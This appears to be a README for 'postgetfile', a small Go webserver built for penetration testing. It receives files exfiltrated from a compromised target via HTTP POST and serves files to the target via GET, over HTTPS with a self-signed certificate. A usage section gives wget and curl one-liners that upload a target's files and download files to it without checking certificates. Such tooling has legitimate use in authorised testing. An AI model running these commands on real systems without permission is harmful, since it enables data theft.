# postgetfile

## Hum... what?

Security tool to help upload/download files via HTTP POST/GET requests
 

Some late night I was reading through this 0x00sec forum post [1] from pry0cc, where was mentioned the *rflathers/postfiledump* [2] docker container as a way to ex-filtrate data from a remote-target, using HTTP POST. 

The overall idea is quite clever: to **exfiltrate** (or upload) a file from target, its issued an HTTP **POST** request, where the **url** sends the filename, and the **body** sends the **file-contents** 

That same night, some time latter, I was skimming through the golang *http* library, and noticed that it looked like easy to make a go webserver to accomplish the same effect. 
Also, golang compiles its programs as single static-binaries (and mutiplatform!), so they can be deployed easily by just copying the binary, without installing dependencies/runtimes/libraries or docker-daemons :)


So this is a quick-experiment to try and see how it goes trying to make this special webserver program in golang, and hopefully add a couple more features that came to my head, like:

- [x]  **Download** file from server into remote-target, via HTTP **GET** request, where the **url** indicates file to download
- [x]  HTTP**S** to encrypt traffic over-the-wire (uses an invalid self-signed certificate, clients should accept it)
- [x]  Leave compiled-binaries ready to be copied, for windows and linux


NOTE: The original webserver of the docker-container is javascript, see here [3]

NOTE2: In this other blog-post [4], rflathers explains how he leverages ngrok with his tool, to exfiltrate files using a valid public domain, with valid HTTPS certificate - check it out, its a very elegant tactic :)



[1] https://0x00sec.org/t/tricks-of-the-trade-from-5-years-in-offensive-cyber-security/15794

[2] https://hub.docker.com/r/rflathers/postfiledump

[3] https://github.com/ropnop/dockerfiles/blob/master/postfiledump/server.js

[4] https://blog.ropnop.com/docker-for-pentesters/


## Does it work?

    # In server: 
    ./postgetfile.Linux.x64.static 

    # In remoteTarget, upload file to server 
    wget -qO- --no-check-certificate --post-file ./myFileInTarget https://127.0.0.1/myFileInTargetUploadedToServer
    curl -sk --data-binary @./myFileInTarget https://127.0.0.1/myFileInTargetUploadedToServer
           
    # In remoteTarget, download file from server
    wget -qO- --no-check-certificate https://127.0.0.1/myFileInServer > ./myFileInServerDownloadedToTarget
    curl -sko - https://127.0.0.1/myFileInServer > ./myFileInServerDownloadedToTarget

[![asciinema demo](https://asciinema.org/a/TEw5y2kr5ce1tb2fqTgct3T8Y.png)](https://asciinema.org/a/TEw5y2kr5ce1tb2fqTgct3T8Y?autoplay=1)
